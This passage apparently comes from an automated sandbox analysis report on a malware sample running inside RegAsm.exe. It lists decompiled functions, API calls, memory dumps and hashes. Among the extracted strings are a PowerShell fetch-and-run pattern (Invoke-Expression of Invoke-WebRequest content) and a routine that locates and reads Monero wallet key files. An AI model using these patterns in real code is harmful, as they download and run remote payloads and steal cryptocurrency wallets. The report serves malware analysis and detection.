                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                • API String ID: 585178538-186952963
                                                                                                                                                                                                • Opcode ID: b320b2290c2ed4de86da97ffb2adf623fffe1fcda058c910bc0b37f781464592
                                                                                                                                                                                                • Instruction ID: 9ecd63cdeb7db8a61a94a24a18639f88c6bdacdaded08a3f6ee19dfbbe3e3d40
                                                                                                                                                                                                • Opcode Fuzzy Hash: b320b2290c2ed4de86da97ffb2adf623fffe1fcda058c910bc0b37f781464592
                                                                                                                                                                                                • Instruction Fuzzy Hash: E9D15EB0801248EADB05EBE2C956FDDBBB8AF15308F5044AEE545731C2DB781B18DB76
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B545470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!0.15g$%lld$JSON cannot hold BLOB values
                                                                                                                                                                                                • API String ID: 0-1047910854
                                                                                                                                                                                                • Opcode ID: f34e9dfc98a6c8a3a314860764c6224638df87583013990de40d5b6703e7763c
                                                                                                                                                                                                • Instruction ID: 1ed7747d37408d4aa1c49579777836e2a6f4bce294278fbcb21e5b3adbf2f919
                                                                                                                                                                                                • Opcode Fuzzy Hash: f34e9dfc98a6c8a3a314860764c6224638df87583013990de40d5b6703e7763c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 86519C7A5002007AFB105B28FC42FFE7B66DFC6329F34025DF94547682FB67A55642A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C2B70 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 183COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
                                                                                                                                                                                                • API String ID: 0-1763475469
                                                                                                                                                                                                • Opcode ID: cfb7e22c006e2c807542c7918f148a1b48c351897e3256e215b4b7555e8d694d
                                                                                                                                                                                                • Instruction ID: 085640a4cbca69a8cfe42827d89b64b38abc0ef0b980d8805081b6fc83ad3d14
                                                                                                                                                                                                • Opcode Fuzzy Hash: cfb7e22c006e2c807542c7918f148a1b48c351897e3256e215b4b7555e8d694d
                                                                                                                                                                                                • Instruction Fuzzy Hash: C5719278808386DBD704CF24D840B9BBBE4FFA8704F008A5EF99997241E775E549CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040E678 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040E67D
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040E693
                                                                                                                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040E6B5
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E6F7
                                                                                                                                                                                                • ??_V@YAXPAX@Z.MSVCRT ref: 0040E830
                                                                                                                                                                                                  • Part of subcall function 0040D1D6: strlen.MSVCRT ref: 0040D1ED
                                                                                                                                                                                                  • Part of subcall function 0040CD90: memcpy.MSVCRT ref: 0040CDB0
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040E70F, 0040E7F8
                                                                                                                                                                                                • N0ZWFt, xrefs: 0040E79A, 0040E7A7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                                                                                                                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                • API String ID: 3050127167-1622206642
                                                                                                                                                                                                • Opcode ID: 701ba4fa2b1a171a60f3fb8e5d521b8617fd806ba654350b00242465403191ad
                                                                                                                                                                                                • Instruction ID: 839985bfb7f102bcbe3af91687aa45d7aa919cac8a527869c7fc28f0c9758264
                                                                                                                                                                                                • Opcode Fuzzy Hash: 701ba4fa2b1a171a60f3fb8e5d521b8617fd806ba654350b00242465403191ad
                                                                                                                                                                                                • Instruction Fuzzy Hash: 22518F71D04219AEDB14EB91DC82AEEBBB9EF04314F20057EF104B72C1DB785E948B59
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B53AA40 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 334COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 205c74e4c884be0eda76af671c4c159afdd2d18b7ba678e284a3c9e1021343f4
                                                                                                                                                                                                • Instruction ID: 33a14e2a5db6c5dc410bd436a1b71204d6af721b936652765011b8a977176d47
                                                                                                                                                                                                • Opcode Fuzzy Hash: 205c74e4c884be0eda76af671c4c159afdd2d18b7ba678e284a3c9e1021343f4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 06B1F0B5E003459BFB108F24DC46BDF77A8AF94317F04492CE9968B3A1E775E44887A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BA170 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 286COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: JSON path error near '%q'$malformed JSON
                                                                                                                                                                                                • API String ID: 0-560895927
                                                                                                                                                                                                • Opcode ID: 793a1a69116082c25487b29baad578ad72e2b69d4091d8ab143b7b8c6bda3048
                                                                                                                                                                                                • Instruction ID: 1efddd112fe1bfa709b782c4c66d4232d4f05e5cb5b84316d43487655c34d5cc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 793a1a69116082c25487b29baad578ad72e2b69d4091d8ab143b7b8c6bda3048
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DA18CB1A003019BDB14CF24D945BE6BBE0EF80305F14C52DE5858B342EB36E94ACBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C3D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %Q.$=%Q$PRAGMA
                                                                                                                                                                                                • API String ID: 0-2099833060
                                                                                                                                                                                                • Opcode ID: c66632ab4d62db9307493aa41e909b56473397b1398967f7854cfe7bae6d8a3f
                                                                                                                                                                                                • Instruction ID: 176d6a21409dab7f890fe61640c949827919f182da3b9905dea6d45277d2cd7c
                                                                                                                                                                                                • Opcode Fuzzy Hash: c66632ab4d62db9307493aa41e909b56473397b1398967f7854cfe7bae6d8a3f
                                                                                                                                                                                                • Instruction Fuzzy Hash: F87105799043019BDB00DF24DC85BDBB7A8AF94B15F04896DFC859B341D335EA49CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00401C6B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 179stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00401C70
                                                                                                                                                                                                • memset.MSVCRT ref: 00401C8E
                                                                                                                                                                                                  • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                                                                                                                                  • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                                                                                                                                  • Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                                                                                                                                  • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                                                                                                                                • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                • memset.MSVCRT ref: 00401E9D
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                                                                                                                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                • API String ID: 1518627966-218353709
                                                                                                                                                                                                • Opcode ID: b546d9b61220f5c2c2ebf37daa28290af55609e5586465d455a554e70a57de66
                                                                                                                                                                                                • Instruction ID: 74627ad0a19d4cd4a401f8f025dee815ee59ebe6216bd5f6572279d46b23df22
                                                                                                                                                                                                • Opcode Fuzzy Hash: b546d9b61220f5c2c2ebf37daa28290af55609e5586465d455a554e70a57de66
                                                                                                                                                                                                • Instruction Fuzzy Hash: CA716CB1D00248AADB04EBE5D846FDDBBB8AF19308F14446EF545B31D2EB781718CB69
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AB980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 35f92ecb2627b60c19c78aae7684a3110ede191b5b1008896401a46510ffb368
                                                                                                                                                                                                • Instruction ID: c5e71f2508bfd23345cfb458f5035821de74e81fe894bf9ecb532a9bc0b19a39
                                                                                                                                                                                                • Opcode Fuzzy Hash: 35f92ecb2627b60c19c78aae7684a3110ede191b5b1008896401a46510ffb368
                                                                                                                                                                                                • Instruction Fuzzy Hash: D08189748043829BDB018F30C9517EABBA0BFA5200F44CD6CE8D79B79AD735D996C782
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4EF600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
